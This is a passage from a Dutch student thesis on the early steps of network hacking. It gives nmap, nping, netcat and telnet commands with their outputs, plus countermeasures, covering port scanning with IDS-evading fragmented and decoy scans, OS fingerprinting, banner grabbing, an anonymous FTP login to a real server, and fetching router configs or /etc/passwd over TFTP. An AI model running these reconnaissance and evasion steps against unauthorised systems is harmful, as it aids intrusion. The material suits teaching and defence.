o als er een “ICMP port unreachable” terugkomt dan is de poort gefilterd (type 3 code

1, 2, 9, 10 of 13)

o als er niets terugkomt, dan is de poort open of gefilterd

Commando: nmap –sU 192.168.1.1

Bron: http://nmap.org/book/man-port-scanning-techniques.html

Page 54: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

54

6.1.2.2 Uitbreiding: mogelijkheden van Nmap

Bij de volgende poortscan heb ik gebruik gemaakt van het TCP SYN type poortscan, je kan dit type

poortscan vervangen door het type die je wil gebruiken. Bovendien kan je bij de IP-adressen ook

altijd een subnet masker toevoegen. Dit subnet masker moet dan wel aan het IP-adres kleven.

TCP SYN Scan op een specifieke poort (-sS –p 22 –open)

Een poortscan maar enkel op poort 22 omdat deze poort vaak gebruikt wordt. Deze poort is

SSH, enkele andere veel voorkomende poorten zijn: SMTP (25), POP (110), AUTH (113), IMAP

(143)

Commando: nmap -sS -p 22 –open 192.168.1.1

TCP SYN Scan gefragmenteerd (-f)

Door “-f” te gebruiken zal de TCP header gefragmenteerd worden over verschillende

pakketten. Hierdoor wordt het moeilijker voor de firewall of IDS systeem om deze scan te

onderscheppen.

Commando: nmap –sS –f 192.168.1.1

TCP SYN Scan met een afleidingsmanoeuvre (-D)

Door “-D” te gebruiken zullen er nog andere scans gebeuren van een ander IP-adres, dit om

het systeem af te leiden van de echte scan.

Als tweede IP-adres geef je het best een IP-adres van een legitieme server op, die zich

bevindt op hetzelfde netwerk, waarvan hij wel scans aanvaardt.

Commando: nmap –sS 192.168.1.1 –D 192.168.1.2

TCP SYN Scan, output in document plaatsen (-oN outfile.txt)

Als de scan afgelopen is zal Nmap een bestand aanmaken waarin hij zal wegschrijven, exact

wat er op het scherm verschijnt

Het bestand heet outfile.txt

Commando: nmap –sS 192.168.1.1 -oN outfile.txt

TCP SYN Scan, output in een tab-gelimiteerd bestand (-oG outfileTAB.txt)

Resultaat van je scan in een tab-gelimiteerd file steken

Het bestand heet outfileTAB.txt

Commando: nmap –sS 192.168.1.1 -oG outfileTAB.txt

TCP SYN Scan, output in een bestand met XML formaat(-oX outfileXML.txt)

Resultaat van je scan in XML formaat opslaan

Het bestand heet outfileXML.txt

Commando: nmap –sS 192.168.1.1 -oX outfileXML.txt

TCP SYN Scan, output in gewoon-, tab-gelimiteerd- en XML- formaat (-oA outfile.txt)

Resultaat van je scan in zowel, normaal, tab-gelimiteerd en XML formaat opslaan. In dit geval

zijn er vier bestanden aangemaakt.

Deze bestanden heten:

o outfile.txt.nmap, in normaal formaat

Page 55: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

55

o outfile.txt.gnmap, in tab-gelimiteerd formaat

o outfile.txt.xml, in XML formaat

Commando: nmap –sS 192.168.1.1 -oA outfile.txt

6.2 Hping3 en Nping Hping3 is een tool die kan gebruikt worden voor zeer veel uiteenlopende doeleinden. Vermits we

ICMP scan en TCP/UDP poortscans besproken hebben, zal hij in dit geval gebruikt worden om

poorten te scannen en om host discovery toe te passen. Het nadeel aan Hping3 is dat het niet meer

onderhouden wordt. De laatste keer dat er updates zijn toegepast dateren van 2005. Aangezien dit

toch een zeer goede tool is, hebben Luis Martin Garcia en Fyodor beslist om zijn functionaliteit toe

voegen aan een tool dat bij Nmap hoort. Deze tool heet Nping. Nping is dus een geüpdatet versie van

Hping3.

6.2.1 ICMP scan In het volgend voorbeeld zal Nping gebruikt worden om twee ICMP berichten te sturen van het type

timestamp.

Commando: Sudo nping -c 2 --icmp --icmp-type time 192.168.1.1

Resultaat:

root@bt:~# nping -c 2 --icmp --icmp-type time 192.168.1.1

Starting Nping 0.6.25 ( http://nmap.org/nping ) at 2013-12-23 11:11 CET

SENT (0.0053s) ICMP 192.168.1.18 > 192.168.1.1 Timestamp request

(type=13/code=0) ttl=64 id=60735 iplen=40

RCVD (0.0061s) ICMP 192.168.1.1 > 192.168.1.18 Timestamp reply

(type=14/code=0) ttl=64 id=64725 iplen=40

SENT (1.0063s) ICMP 192.168.1.18 > 192.168.1.1 Timestamp request

(type=13/code=0) ttl=64 id=60735 iplen=40

RCVD (1.0072s) ICMP 192.168.1.1 > 192.168.1.18 Timestamp reply

(type=14/code=0) ttl=64 id=64726 iplen=40

Max rtt: 0.750ms | Min rtt: 0.727ms | Avg rtt: 0.738ms

Raw packets sent: 2 (80B) | Rcvd: 2 (92B) | Lost: 0 (0.00%)

Tx time: 1.00237s | Tx bytes/s: 79.81 | Tx pkts/s: 2.00

Rx time: 1.00305s | Rx bytes/s: 91.72 | Rx pkts/s: 1.99

Nping done: 1 IP address pinged in 1.01 seconds

Page 56: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

56

6.2.2 TCP/UDP port scanning Met Nping kan je een poortscan uitvoeren zoals beschreven in 3.5. aangezien Nping een brede tool is

zal je ook meer zien in de output. Je kan dit doen met het volgende commando:

Sudo nping –c 2 –tcp –p 22 –-flags syn 192.168.1.23

Met dit commando zal je 2 requests sturen op TCP poort 22. Je zal dan ook vragen om de pakketten

te taggen met S of SA.

Bekomen resultaat:

root@bt:~# nping -c 2 -tcp -p 22 --flags syn 192.168.1.1

Starting Nping 0.6.25 ( http://nmap.org/nping ) at 2013-12-23 11:10 CET

SENT (0.0352s) TCP 192.168.1.18:52417 > 192.168.1.1:22 S ttl=64 id=25621

iplen=40 seq=1440928595 win=1480

RCVD (0.0375s) TCP 192.168.1.1:22 > 192.168.1.18:52417 RA ttl=64 id=14225

iplen=40 seq=0 win=0

SENT (1.0357s) TCP 192.168.1.18:52417 > 192.168.1.1:22 S ttl=64 id=25621

iplen=40 seq=1440928595 win=1480

RCVD (1.0366s) TCP 192.168.1.1:22 > 192.168.1.18:52417 RA ttl=64 id=14226

iplen=40 seq=0 win=0

Max rtt: 2.222ms | Min rtt: 0.729ms | Avg rtt: 1.475ms

Raw packets sent: 2 (80B) | Rcvd: 2 (92B) | Lost: 0 (0.00%)

Tx time: 1.00180s | Tx bytes/s: 79.86 | Tx pkts/s: 2.00

Rx time: 1.00251s | Rx bytes/s: 91.77 | Rx pkts/s: 1.99

Nping done: 1 IP address pinged in 1.04 seconds

Nping bevat ook nog andere functionaliteiten zoals:

Spoofing source MAC-adres

Spoofing source IP adres

Vele zaken die je kan gebruiken om je identiteit in een netwerk te verstoppen

Page 57: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

57

6.3 ScanLine Scanline is een kleine CLI tool die gebruikt wordt op Windows computers. Hierdoor is het gemakkelijk

om binnen te sluizen in een geïnfecteerd systeem. Je kan er scans mee uitvoeren zonder dat het op

het systeem geïnstalleerd is.

Met dit commando zal je een scan doen van de TCP poorten 21,22,23,25 en 8080. Door “–p” te

gebruiken zal je geen ping doen op voorhand, omdat je al weet dat dit toestel actief is in je netwerk.

Commando: sl -t 21,22,23,25,8080 -p 192.168.1.1

Resultaat:

ScanLine (TM) 1.01

Copyright (c) Foundstone, Inc. 2002

http://www.foundstone.com

Scan of 1 IP started at Mon Dec 23 17:25:22 2013

--------------------------------------------------------------------

192.168.1.1

Responds with ICMP unreachable: No

TCP ports: 23 8080

--------------------------------------------------------------------

Scan finished at Mon Dec 23 17:25:26 2013

1 IP and 5 ports scanned in 0 hours 0 mins 4.03 secs

Gedownload van: http://www.mcafee.com/us/downloads/free-tools/scanline.aspx

6.4 netcat Netcat is een CLI tool die al heel lang bestaat. Dit is een tool die vooral nuttig is als je de zaken die je

achterlaat (de footprint) wilt beperken. Deze tool heeft zeer veel functionaliteiten, de functionaliteit

die hier zal besproken worden is de TCP en UDP poortscan functionaliteit.

6.4.1 TCP poortscan Met dit commando zal je een poortscan doen van de poorten 1 tot 100. Met “-v” laat je weten dat je

het moeten laten zien op je scherm, met “-z” laat je weten dat hij een poortscan moet uitvoeren. En

“-w2” is de time-out die je instelt per connectie.

Commando: nc -v -z -w2 192.168.1.1 1-100

Resultaat:

(UNKNOWN) [192.168.1.1] 80 (http) open

(UNKNOWN) [192.168.1.1] 23 (telnet) open

Page 58: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

58

6.4.2 UDP poortscan Met dit commando zal je een poortscan doen van de UDP poorten 53, 67 en 68. Aangezien netcat

standaard een TCP poortscan uitvoert moet je “-u” toevoegen om te laten weten dat je een UDP

poortscan wil uitvoeren. Met “-v” laat je weten dat je het moet laten zien op je scherm, met “-z”

laat je weten dat hij een poortscan moet uitvoeren. En “-w2” is de time-out voor elke connectie.

Commando: nc -u -v -z -w2 192.168.1.1 53 67 68

Resultaat:

(UNKNOWN) [192.168.1.1] 53 (domain) open

(UNKNOWN) [192.168.1.1] 67 (bootps) open

(UNKNOWN) [192.168.1.1] 68 (bootpc) open

Netcat is te downloaden van: http://joncraton.org/blog/46/netcat-for-windows

6.5 SuperScan Dit is een GUI waarmee je netwerk scans kan uitvoeren. Je kan hier heel veel zaken aan- en uit-

zetten. De scans waartoe ik me beperkt heb zijn ICMP ping sweeps. Ik heb dit gedaan met SuperScan

4.1 en met SuperScan 3.0. Ik ben wisselende resultaten tegengekomen. Je kan de verkregen

informatie van de scan zien als een HTML bestand, wat het overzichtelijk maakt.

Met SuperScan kan je ook een UDP en TCP host discovery doen. Je moet dan de checkbox voor ICMP

uitzetten.

De tools zijn enkel ontwikkeld voor Windows en zijn te downloaden van:

SuperScan 3.0: http://www.mcafee.com/us/downloads/free-tools/superscan3.aspx

SuperScan 4.1: http://www.mcafee.com/us/downloads/free-tools/superscan.aspx

Zoals u kan zien, zijn er twee versies van deze software. Ik heb ze beide uitgeprobeerd en SuperScan

4.1 werkte niet zoals verwacht. Hij liet steeds zien dat er maar 1 host gevonden is. Zoals u kan zien in

de foto hieronder:

Afbeelding 6-1 Superscan 4.1

Page 59: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

59

SuperScan3 werkt wel naar behoren. De scan met SuperScan3 leverde het volgende resultaat op:

Afbeelding 6-2 Superscan 3.0

6.6 Poort scans Tegenmaatregels Een poortscan is een belangrijke scan voor een hacker, om het systeem dat hij wil aanvallen

te identificeren. Voor een verdediger is het moeilijk om zo een poortscan tegen te houden. Er zijn

sommige technieken die je kan gebruiken om een soortgelijke poortscan tegen te houden.

6.6.1 Snort IDS Dit is een goede applicatie om poortscans op te sporen en te rapporteren. Dit programma heeft niet

de mogelijkheid om een poortscan tegen te houden, wel om te rapporten wanneer er een

plaatsvindt of plaatsgevonden heeft.

6.6.2 Treshold logging Treshold loggin is een methode die je kan gebruiken om je log eerst te groeperen voor hem door te

zenden naar uw e-mail adres of computer. Je zou dit kunnen doen om een goed overzicht te houden

van de situatie. Het is niet de bedoeling dat je bij een aanval voor elk pakket een e-mail krijgt. Want

dan zou je mailbox overspoeld worden met e-mails en dan heb je geen overzicht meer van de

situatie.

6.6.3 Onnodige services afzetten Iets wat je zeker zou moeten doen is al je onnodige services afzetten waardoor de overeenkomstige

poorten gesloten zullen worden. Je kan dit, zowel in UNIX als in Windows doen.

UNIX: in het bestand /etc/inetd.conf voor al de onnodige services een “#” plaatsen

Windows: Control panel en hierna Services kiezen

6.6.4 Voorzichtig te werk gaan met tegenmaatregels Als je een poortscan tegenhoudt door het IP-adres te blokkeren van de persoon die de poortscan

uitvoert kan het zijn dat je een medewerker blokkeert die er niets mee te maken heeft. Het kan zijn

dat de aanvaller zijn IP-adres veranderd heeft in een IP-adres van een medewerker, om zo zijn

identiteit te verdoezelen.

Page 60: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

60

7 Raden naar het besturingssysteem Op dit moment weten we welke toestellen actief zijn op het netwerk en op welke services op deze

toestellen actief zijn. Hierdoor weet je dus ook welke poorten openstaan. Het volgende dat we

moeten doen is achterhalen welk besturingssysteem aanwezig is op de doelcomputer. Dit kan je op

verschillende manieren doen:

Met de poorten te analyseren kan je een gok doen maar zeker niet met zekerheid zeggen welk

besturingssysteem op de doelcomputer geïnstalleerd staat.

Poorten analyseren

o Windows: poorten 135, 139 en 445

o UNIX: poorten 22, 111, 512-514, 2049 en > 3277

Je kan ook aan stack fingerprinting doen, dit is veel betrouwbaarder maar duurt wel langer.

Fingerprinting

o Active stack fingerprinting: hiermee zal je actief pakketten naar de doelcomputer

sturen. Dit kan gelogd worden door het systeem waardoor je buitengesloten kan

worden.

o Passive stack fingerprinting: hiermee zal je in het netwerk luisteren naar de

pakketten die voorbijgaan. Hieruit kan je afleiden waar welk toestel staat zonder dat

iemand hier iets van te weten komt.

7.1 Active Stack Fingerprinting Active Stack fingerprinting is een manier om te achterhalen welk besturingssysteem actief is op de

doelcomputer. Je stuurt verschillende pakketten naar de doelcomputer en afhankelijk van zijn

reactie, kan je afleiden welk besturingssysteem gebruikt wordt.

Commando met Nmap: nmap –O 192.168.1.1

Resultaat:

root@bt:~# nmap -O 192.168.1.20

Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-24 14:36 CET

Nmap scan report for 192.168.1.20

Host is up (0.0062s latency).

Not shown: 995 filtered ports

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

2869/tcp open icslap

49159/tcp open unknown

MAC Address: 4C:0F:6E:2C:C5:F6 (Hon Hai Precision Ind. Co.)

Device type: general purpose|phone

Running: Microsoft Windows 7|Vista|2008|Phone

OS CPE: cpe:/o:microsoft:windows_7::-:professional

cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1

cpe:/o:microsoft:windows_server_2008::sp1

cpe:/o:microsoft:windows

OS details: Microsoft Windows 7 Professional, Microsoft Windows Vista SP0

or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2,

Windows 7 SP1, or Windows Server 2008, Microsoft Windows Phone 7.5

Network Distance: 1 hop

Page 61: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

61

OS detection performed. Please report any incorrect results at

http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.90 seconds

Nmap heeft in de achtergrond de IP stack van de computer die ik laten analyseren heb, geanalyseerd

volgens onderstaande eigenschappen. Om dit te kunnen doen, heeft Nmap wel minstens 1 open

poort nodig:

FIN probe

Bogus flag probe

Initial Sequence Number (ISN) sampling

“Don’t fragment bit” monitoring

TCP initial window size

ACK value

ICMP error message quenching

ICMP message quoting

ICMP error message – echoing integrity

Type of service (TOS)

Fragment handling

TCP options

Als Nmap geen open poorten vindt, zal hij raden naar het besturingssysteem en zelfs dan kan Nmap

juist raden naar het besturingssysteem.

Op de computer die ik laten scannen heb, is het besturingssysteem Microsoft Windows 7 home

Premium geïnstalleerd. Als we de scan analyseren komen we tot het besluit dat de scan gelukt is en

uit de scan is gebleken dat er Microsoft Windows 7 op de computer geïnstalleerd staat.

7.2 Passive Stack Fingerprinting Passive stack fingerprinting is een manier om te weten te komen welk besturingssysteem op de

doelcomputer geïnstalleerd staat. Je zal in het netwerk luisteren naar de pakketten die voorbijgaan.

Bij deze manier is het wel noodzakelijk om op een centrale plek op het netwerk te zijn.

Je zal pakketten analyseren en kijken naar de volgende zaken:

TTL: wat is de grootte van de time-to-live.

Window size: wat is de window size?

DF: is er een “Don’t fragment bit?”

7.3 Raden naar het besturingssysteem Tegenmaatregels Om tegen te gaan dat Nmap of andere tools je besturingssysteem kunnen vinden, kan je de

dezelfde tools gebruiken als besproken zijn om poortscans tegen te houden, zoals Snort.

Wat je ook kan doen is de broncode van je besturingssysteem wijzigen, zodat je besturingssysteem

op verschillende pakketten anders reageert. Dit is heel moeilijk om uit te voeren en is alleen maar

mogelijk als je er echt in gespecialiseerd bent. Het is immers geen ramp als een hacker je

besturingssysteem te weten komt. Er zijn nog vele andere zaken waarmee je je kan beschermen

tegen aanvallen.

Page 62: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

62

8 Processing and storing scan data Als je een groot netwerk hebt en je doet op dat netwerk verschillende scans, dan wordt het

onoverzichtelijk om daar de juiste conclusies uit te trekken. Het is daarom nuttig om de gegevens die

je van de scans behaald hebt in een databank te zetten. Van hieruit heb je een overzichtelijk beeld

van de scan data. Je kan dit doen door het Metasploit framework te gebruiken.

Page 63: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

63

Stap 3: Ennumeratie 1 Inleiding In stap twee Scanning zijn we op zoek gegaan naar welke services op welke hosts aanwezig zijn. In

deze stap gaan we hier nog verder op in. We zullen bij Enumeratie overgaan tot het identificeren van

de service en het besturingssysteem. We kunnen hierbij ook te weten komen welke versie hiervan

geïnstalleerd is. Om dit te kunnen doen, zullen we connecties moeten opstellen naar de systemen.

Deze connecties kunnen of zullen gelogd worden door het systeem dat je wil aanvallen, waardoor er

een mogelijkheid bestaat dat je uitgesloten word van het netwerk. Veel van de informatie die je via

deze manier buitmaakt lijkt op het eerste zicht ongevaarlijk, maar met die informatie kan je veel

doen achteraf. Dit wordt nog verder besproken in de volgende stappen, Hacking Unix en Remote

Connectivity.

De services die zullen besproken worden zijn:

FTP: TCP poort 21

Telnet: TCP poort 23

TFTP: TCP/UDP poort 69

IPSec/IKE: UDP poort 500

2 Nmap version scanning Voor we kunnen beginnen met de services te inventariseren, zullen we eerst een scan moeten

uitvoeren om te weten welke services actief zijn achter welke poorten. Dit soort scan is uitgebreid

uitgelegd in Stap 2: scanning. We zullen eerst een poortscan uitvoeren en dan zullen we een versie-

scan uitvoeren. Een poortscan zal naast de poorten informatie plaatsen van wat Nmap denkt over de

service die achter de betreffende poort zit. Deze informatie haalt Nmap uit een tabel met naast elke

poort een standaard service. Met een versiescan zal Nmap actief verschillende zaken uitvoeren om

zo te weten te komen welke service achter welke poort zit.

Zoals je hieronder kan zien weet de TCP SYN scan bij sommige poorten niet over welke service het

gaat, de versiescan weet wel over welke soort poorten het gaat.

Page 64: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

64

2.1 TCP SYN poortscan Commando:

root@bt:~# nmap -sS 192.168.1.5

Resultaat:

Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-02 20:40 CET

Nmap scan report for 192.168.1.5

Host is up (0.0040s latency).

Not shown: 994 closed ports

PORT STATE SERVICE

80/tcp open http

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

515/tcp open printer

2121/tcp open ccproxy-ftp

MAC Address: 00:1C:F0:1B:28:BB (D-Link)

Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds

Bij dit soort poortscan kan je zien dat er naast de poorten een service staat. De naam van de service

wordt uit het bestand nmap-services gehaald. Dit is een simpel tekstbestand waar de

overeenkomstige namen uitgehaald worden. Nmap kan dus wel eens verkeerd zijn met deze

benamingen.

2.2 TCP versiescan Commando:

root@bt:~# nmap -sV 192.168.1.5 –p 2121

Resultaat:

Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-02 20:40 CET

Nmap scan report for 192.168.1.5

Host is up (0.0051s latency).

PORT STATE SERVICE VERSION

2121/tcp open ftp Pure-FTPd

MAC Address: 00:1C:F0:1B:28:BB (D-Link)

Service detection performed. Please report any incorrect results at

http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds

Bij dit soort scan, een TCP versiescan zal Nmap veel verder gaan dan alleen in een bestand te zoeken

naar de overeenkomstige benamingen.

Een versiescan zal de volgende zaken doen:

maakt connectie met de poort

vragen naar feedback

vergelijkt wat hij terugkrijgt met gekende protocollen

deze informatie haalt hij uit het bestand nmap-service-probe

In dit voorbeeld heeft hij eerst poort 2121 aangeschreven als een FTP-proxy. Daarna met de

versiescan is hij tot het besluit gekomen dat dit gaat om een FTP server met een versie van Pure-FTPd

Page 65: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

65

3 Basic Banner Grabbing Door Banner Grabbing toe te passen kan je veel te weten komen over het systeem dat je wilt

aanvallen. Bij Banner Grabbing zal je connecteren met de poort waar je meer over te weten wilt

komen. Je zal dan de output analyseren en hieruit kan je veel afleiden.

Je kan verschillende commando’s gebruiken om aan Banner Grabbing te doen, in dit voorbeeld zal

het commando Telnet gebruikt worden.

3.1 Banner Grabbing met Telnet Commando:

root@bt:~# telnet 192.168.1.1 80

Resultaat:

HTTP/1.0 400 Bad Request

Content-Type: text/html

Cache-Control: no-cache

Pragma: no-cache

Expires: Thu, 02 Jan 2014 20:30:08 GMT

Date: Thu, 02 Jan 2014 20:00:08 GMT

Accept-Ranges: bytes

Connection: close

<html>

<head>

<title>400 Bad Request</title>

</head>

<body bgcolor="ffffff">

<h2>400 Bad Request<h2>

<p>

</body>

</html>

Connection to host lost.

Uit het vorige kunnen we afleiden dat er op 192.168.1.1 een webserver aanwezig is op poort 80.

Mocht er zich achter poort 80 niets bevinden, dan zouden we het volgende resultaat krijgen:

Commando:

root@bt:~# telnet 192.168.1.3 80

Resultaat:

Connecting To 192.168.1.3...Could not open connection to the host, on port

80: Connect failed

Page 66: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

66

3.2 Banner Grabbing Tegenmaatregels Je kan als netwerk administrator ook beslissen om maar een bepaald aantal hosts toegang te

geven tot die bepaalde poort/service. Zo kan je bijvoorbeeld enkel van de computer van de

administrator een Telnet sessie aanmaken naar de router. Je kan dit doen door netwerk acces control

toe te passen.

De beste beveiliging tegen Banner Grabbing is de poorten die niet nodig zijn uit te schakelen.

Je kan ook de informatie laten aanpassen die te zien is via Banner Grabbing. Op die manier kan er

nauwelijks aan Banner Grabbing gedaan worden.

4 Enumerating veel voorkomende services In dit hoofdstuk zullen we veel voorkomende services inventariseren. De services die zullen

besproken worden zijn:

FTP: TCP poort 21

Telnet: TCP poort 23

TFTP: TCP/UDP poort 69

IPSec/IKE: UDP poort 500

4.1 FTP Enumeration, TCP 21 FTP is een protocol dat steeds minder gebruikt wordt omdat het onveilig is, maar omdat het zo

gemakkelijk is toe te passen wordt het nog steeds gebruikt.

Als je een website laat hosten via Belgacom of een andere ISP, kan je je website beheren via FTP. Je

zal dan een login krijgen tot je eigen persoonlijke ruimte op die FTP-server. Je kan dan HTML-pagina’s

op die FTP-server plaatsen. Hierdoor zal je HTML-pagina, dus website, te zien zijn op het internet.

4.1.1 FTP anonymous access Er zijn FTP-servers die toelaten om anoniem met hun te verbinden. Hierdoor heb je geen controle

over wie wel en niet mag connecteren met je FTP-server.

Om de volgende test uit te voeren heb ik eerst gezocht naar anonieme FTP servers op de site

http://www.ftp-sites.org/.

Commando:

root@bt:~# ftp ftp.c-logic.be, anonymous, ls

Resultaat:

Connected to srvftp.c-logic.be.

220 Microsoft FTP Service

User (srvftp.c-logic.be:(none)): anonymous

331 Anonymous access allowed, send identity (e-mail name) as password.

Password:

230 Anonymous user logged in.

ftp> ls

200 PORT command successful.

150 Opening ASCII mode data connection for file list.

ASP

Formulieren

INGEKORT

226 Transfer complete.

ftp: 102 bytes received in 0.01Seconds 14.57Kbytes/sec.

Page 67: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

67

Uit het vorige kunnen we afleiden dat de server waar de FTP service op draait, een Microsoft server

is.

FTP is onveilig omdat het al de gegevens verstuurd in gewone tekst dus niet geëncrypteerd. Als er

iemand je verbinding afluistert, kan die persoon te weten komen wat je wachtwoord is en welke

bestanden je via FTP verplaatst.

4.1.2 FTP Tegenmaatregels FTP is een service die je beter niet meer gebruikt. Het is een oude service die ontstaan is als

het internet nog niet zo een gevaarlijke wereld was.

Als je toch gegevens publiek wilt maken doe je dit beter via HTTP en dit om de simpele manier dat je

via HTTP minder gemakkelijk kan te maken hebben met mensen die geïnfecteerde of illegale

bestanden uploaden op je server. Zelf als je FTP zou willen gebruiken is het nog altijd aangeraden om

elke manier van uploaden tegen te houden.

Als je toch FTP wilt gebruiken is het aangeraden om Secure FTP (SFTP) te gebruiken. Dit is een

protocol dat werkt zoals FTP, maar dit protocol zal al de bestanden en tekst die heen en weer gaat

encrypteren met SSH encryptie.

Je kan ook FTP Secure gebruiken. Die zal hetzelfde doen als SFTP, maar deze zal SSL encryptie

gebruiken.

4.2 Telnet Enumeratie, TCP 23 Telnet is een service die veel gebruikt wordt omdat dit het eerste protocol was die remote access

toeliet. Het slechte aan Telnet is dat het al zijn gegevens in gewone tekst zal doorsturen, waardoor

niets geëncrypteerd is, zelf de gebruikersnaam en het wachtwoord niet. Een veel gebruikt alternatief

is Secure Shell (SSH). SSH zal wel encryptie gebruiken voor de gegevens.

4.2.1 System Enumeratie via Telnet Banners Telnet zal meestal een banner laten zien voor je in te loggen via Telnet. Bij een Cisco toestel is dit één

van de volgende:

Commando:

root@bt:~# telnet 192.168.1.1

Resultaat:

User Access Verification.

Password:

Ofwel

User Access Verification.

Username:

Bij de laatste banner kan je ervan uitgaan dat er een vorm van authentication, authorization en

accounting (AAA) aanwezig is. Dit wordt meestal toegepast door het TACACS+ of Radius.

Zoals je kan zien, kan je door dit simpel commando veel te weten komen over de betreffende Telnet

server en het netwerk waar hij op aangesloten is.

Page 68: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

68

4.2.2 User Enumeratie via Telnet Je kan nagaan of je een correcte gebruikersnaam of wachtwoord ingevoegd hebt naargelang de

foutmelding die je terugkrijgt van het betreffende systeem.

4.2.3 Telnet Enumeratie Tegenmaatregels Eerst en vooral zou je Telnet niet meer mogen gebruiken, omdat je alles kan afluisteren wat

er ingevoerd wordt. Je zou het alternatief SSH moeten gebruiken.

Als je toch Telnet wilt gebruiken, is er een mogelijkheid om je banner te veranderen zodat het

moeilijker wordt om aan systeem- of gebruiker-enumeratie te doen.

Het is ook aangeraden om gebruikers opnieuw te laten connecteren als er een foute aanmelding

gebeurt.

4.3 TFTP Enumeratie, TCP/UDP 69 TFTP is een service die veel gebruikt wordt om “images” in te laden in toestellen. Onder andere Cisco

gebruikt dit protocol om zijn IOS te upgraden. Bij TFTP zal je de bestandnaam en de plaats waar het

bestand staat, moeten invoeren voor je het bestand kan downloaden. Dit is zowel veilig als onveilig.

Het is veiliger dan FTP, want je krijgt geen overzicht van al de verschillende bestandsnamen en

directories. Maar het is ook onveilig, omdat er bestanden zijn die op een standaard plaats in een

besturingssysteem opgeslagen zijn. In een UNIX systeem zijn er bestanden waar al de

gebruikersnamen en bijhorende gegevens opgeslagen staan. Dit is het bestand: /etc/passwd.

4.3.1 Bestanden kopiëren met een Linux TFTP Server In het volgend voorbeeld wordt er uitgelegd hoe je een bestand kan kopiëren via TFTP naar een

ander systeem.

De volgende tool kan hiervoor gedownload worden:

TFTPD32 (http://tftpd32.jounin.net/tftpd32_download.html)

Commando’s:

root@bt:~# tftp 192.168.1.8

tftp> connect 192.168.1.8

tftp> get TFTPTest.txt TFTPTest.txt

Received 30 bytes in 0.7 seconds

tftp> quit

Resultaat:

root@bt:~# cat TFTPTest.txt

TFTP transfer is succesvol.

4.3.2 Accessing Router/Switch Configurations via TFTP Als je een poortscan uitvoert op een router of switch en je ziet dat poort 69 openstaat dan kan je een

TFTP overdracht uitproberen. Op deze manier kan je gevoelige informatie te weten komen over de

configuratie van de router of switch. Enkele bestanden die gevoelige gegevens bevatten zijn:

running-config

startup-config

.config

config

run

Page 69: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

69

4.3.3 TFTP Enumeratie Tegenmaatregels TFTP is een onveilig protocol die je best niet gebruikt. Als je dit protocol toch moet gebruiken

dan zorg je er het beste voor dat de bestanden waar je toegang toe hebt, beperkt zijn. En je zorgt er

ook het beste voor dat het TFTP protocol tegen gehouden wordt aan de rand van je netwerk.

Hierdoor kunnen hackers van buiten je interne netwerk niet aan je TFTP server van binnenin je

netwerk.

4.4 IPSec/IKE, UDP 500 Het is zeer moeilijk om een firewall te kraken zodat deze u doorlaat. De meeste aanvallen gebeuren

van binnenin de onderneming. Als je niet fysiek in de onderneming kan zijn, dan kan je ook nog

gebruik maken van een Virtual Private Network (VPN) die opgesteld is voor de mensen die veilig van

op afstand willen werken. Dit is eigenlijk een tunnel die opgesteld wordt van de computer van de

medewerker tot het netwerk van het bedrijf. Als je in deze tunnel binnenbreekt, ben je dus binnen in

het netwerk. Dit is niet zo simpel. Want IPSec en IKE gebruiken veel methodes om het een hacker

